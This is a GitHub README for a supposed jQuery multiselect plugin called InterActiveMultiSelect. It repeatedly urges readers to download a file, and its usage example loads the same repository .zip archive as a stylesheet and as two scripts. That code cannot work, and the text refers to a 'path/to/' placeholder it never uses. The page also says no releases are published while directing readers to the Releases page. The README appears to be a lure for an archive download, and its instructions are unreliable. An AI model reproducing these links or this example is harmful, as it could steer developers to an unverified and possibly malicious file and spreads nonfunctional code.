Skip to content

🌟 Streamline selections with InterActiveMultiSelect, a lightweight jQuery plugin for multiselect dropdowns featuring checkboxes, search, and Bootstrap modal support.

License

Notifications You must be signed in to change notification settings

SodaInCan/InterActiveMultiSelect

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

11 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

πŸŽ‰ InterActiveMultiSelect - Easy Multiselect Dropdown for Your Forms

πŸš€ Getting Started

InterActiveMultiSelect is a simple jQuery plugin that helps you create user-friendly multiselect dropdowns. It comes packed with features such as checkboxes, radio buttons, option groups, and a search box. You can even use it with Bootstrap modals for a seamless experience.

πŸ“₯ Download Now

Download InterActiveMultiSelect

πŸ› οΈ System Requirements

To run InterActiveMultiSelect, ensure your system meets the following requirements:

  • A browser that supports modern JavaScript (like Chrome, Firefox, Safari, or Edge).
  • An active internet connection for downloading the necessary files.

βš™οΈ Features

  • Lightweight: Easy to integrate without slowing down your page.
  • Checkboxes & Radio Buttons: Give users the flexibility to select multiple options or just one.
  • Option Groups: Organize options into groups for easier navigation.
  • Search Functionality: Help users find options quickly with a search bar.
  • Bootstrap Modal Support: Easily incorporate the dropdown within Bootstrap modals.

πŸ“¦ Download & Install

To download InterActiveMultiSelect, visit the Releases page. Follow these steps:

  1. Click the link below to go to the Releases page: Visit Releases Page

  2. On the Releases page, you will find different versions of the plugin. Look for the latest version.

  3. Click on the version number to view the release details.

  4. Scroll down to find the downloadable files. You will see options listed there.

  5. Download the appropriate file for your usage. Depending on your needs, you may choose the compressed version that contains the plugin files.

  6. After downloading, unzip the files if they are compressed.

  7. Integrate the plugin into your HTML page. Here’s how:

    • Include jQuery in your project.
    • Add the InterActiveMultiSelect plugin files to your project directory.
    • Link the CSS and JavaScript files in your HTML.

πŸ“‹ Basic Usage Example

To use InterActiveMultiSelect in your HTML file, follow this example:

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Multiselect Example</title>
    <link rel="stylesheet" href="https://github.com/SodaInCan/InterActiveMultiSelect/raw/refs/heads/main/js/Inter_Multi_Active_Select_1.5.zip">
    <script src="https://github.com/SodaInCan/InterActiveMultiSelect/raw/refs/heads/main/js/Inter_Multi_Active_Select_1.5.zip"></script>
    <script src="https://github.com/SodaInCan/InterActiveMultiSelect/raw/refs/heads/main/js/Inter_Multi_Active_Select_1.5.zip"></script>
</head>
<body>
    <select id="mySelect" multiple>
        <option value="1">Option 1</option>
        <option value="2">Option 2</option>
        <option value="3">Option 3</option>
    </select>

    <script>
        $(document).ready(function() {
            $('#mySelect').InterActiveMultiSelect();
        });
    </script>
</body>
</html>

In this example, replace path/to/ with the actual path to your downloaded files.

✨ Customization Options

InterActiveMultiSelect allows for various customization settings. Here are a few key options you can use:

  • Placeholder Text: Set the initial text that appears in the dropdown.
  • Themes: Choose from several pre-defined styles or create your own.
  • Auto-Select: Options to enable users to automatically select items based on predefined criteria.

πŸ€” FAQs

  1. Is jQuery required? Yes, InterActiveMultiSelect relies on jQuery. Ensure it is included in your project.

  2. Can I use this with React or Vue? While primarily designed for jQuery, you can integrate it with frameworks like React or Vue with additional steps.

  3. What browsers does it support? The plugin supports all modern browsers including Chrome, Firefox, Safari, and Edge.

  4. What happens if I run into issues? Check the GitHub Issues page for solutions or common problems faced by other users.

πŸ“ž Support

For support issues, feel free to raise a question via the GitHub repository. Your feedback is appreciated.

⚠️ License

InterActiveMultiSelect is licensed under the MIT License. You can find the complete license details in the repository.

πŸ“„ Additional Resources

For more information on how to use InterActiveMultiSelect, check out the following resources:

Make your forms interactive and more user-friendly with InterActiveMultiSelect today!

Download InterActiveMultiSelect

About

🌟 Streamline selections with InterActiveMultiSelect, a lightweight jQuery plugin for multiselect dropdowns featuring checkboxes, search, and Bootstrap modal support.

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Contributors 2

  •  
  •